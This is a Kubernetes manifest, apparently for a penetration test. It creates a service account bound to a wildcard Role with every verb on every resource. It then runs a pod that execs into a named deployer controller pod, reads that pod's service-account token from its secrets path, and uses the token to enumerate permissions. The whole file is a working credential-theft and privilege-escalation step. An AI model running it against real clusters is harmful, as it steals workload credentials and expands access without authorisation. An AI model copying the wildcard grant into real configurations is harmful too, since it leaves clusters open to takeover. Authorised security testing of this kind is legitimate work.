apiVersion: v1
kind: ServiceAccount
metadata:
  name: pentest-sa
  namespace: deployer-ci
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pentest-role
  namespace: deployer-ci
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: pentest-bind
  namespace: deployer-ci
subjects:
- kind: ServiceAccount
  name: pentest-sa
  namespace: deployer-ci
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: pentest-role
---
apiVersion: v1
kind: Pod
metadata:
  name: pentest
  namespace: deployer-ci
  labels:
    app: pentest
spec:
  serviceAccountName: pentest-sa
  containers:
  - name: pentest
    image: alpine
    securityContext:
      privileged: false
    command: ["/bin/sh", "-c", "apk add --no-cache kubectl && ttoken=$(kubectl exec -n deployer-ci eric-lcm-declarative-deployer-ag-appset-ctrlr-58496f967b-6tcqk -- cat /var/run/secrets/kubernetes.io/serviceaccount/token) && kubectl --token $ttoken auth can-i --list && sleep 3600"]
